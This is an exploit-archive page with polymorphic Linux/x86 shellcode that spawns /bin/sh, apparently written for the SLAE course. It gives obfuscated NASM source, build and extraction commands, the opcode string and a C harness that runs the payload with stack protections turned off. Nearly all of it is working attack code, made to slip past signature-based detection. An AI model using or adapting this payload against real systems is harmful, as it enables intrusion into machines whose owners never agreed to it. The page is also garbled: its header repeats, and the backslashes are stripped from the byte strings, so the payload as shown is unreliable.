/*
# Title: Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (53 bytes)
# Date: 10-Jan-2018
# Exploit Author: Debashis Pal <debashis.pals[at]gmail.com>
# SLAE-11 /*
# Title: Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (53 bytes)
# Date: 10-Jan-2018
# Exploit Author: Debashis Pal <debashis.pals[at]gmail.com>
# SLAE-1122
# Tested on: i686 GNU/Linux
# '//bin/sh' = 0x68732f6e 0x69622f2f
########## polymorphic.nasm ##########
global _start
section .text
_start:
add esi, 0x30 ;junk
xor ecx, ecx
mul ecx
mov dword [esp-4], ecx
sub esp, 4
mov esi, 0x353ffc3b
add esi, 0x33333333 ; 0x68732f6e
mov dword [esp-4], esi
mov edi, 0xada67373
sub edi, 0x44444444 ; 0x69622f2f
mov dword [esp-8], edi
sub esp, 8
mov ebx, esp
mov al, 11
int 0x80
####################################
$ nasm -f elf polymorphic.nasm
$ ld -o polymorphic polymorphic.o
$ objdump -d ./polymorphic|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr ' ' ' '|sed 's/ $//g'|sed 's/ /\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"x83xc6x30x31xc9xf7xe1x89x4cx24xfcx83xecx04xbex3bxfcx3fx35x81xc6x33x33x33x33x89x74x24xfcxbfx73x73xa6xadx81xefx44x44x44x44x89x7cx24xf8x83xecx08x89xe3xb0x0bxcdx80"
$ gcc -fno-stack-protector -z execstack shellcode.c -o x86PolymorphicShellcodelinux32
$ ./x86PolymorphicShellcodelinux32
Shellcode Length: 53
$ uname -a
Linux kali 4.4.0-kali1-686 #1 SMP Debian 4.4.2-3kali1 (2016-02-23) i686 GNU/Linux
$
####################################
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] =
"x83xc6x30x31xc9xf7xe1x89x4cx24xfcx83xecx04xbex3bxfcx3fx35"
"x81xc6x33x33x33x33x89x74x24xfcxbfx73x73xa6xadx81xefx44x44"
"x44x44x89x7cx24xf8x83xecx08x89xe3xb0x0bxcdx80";
int main()
{
printf("Shellcode Length: %d
", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
Linux x86 execve bin sh Polymorphic Shellcode
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 396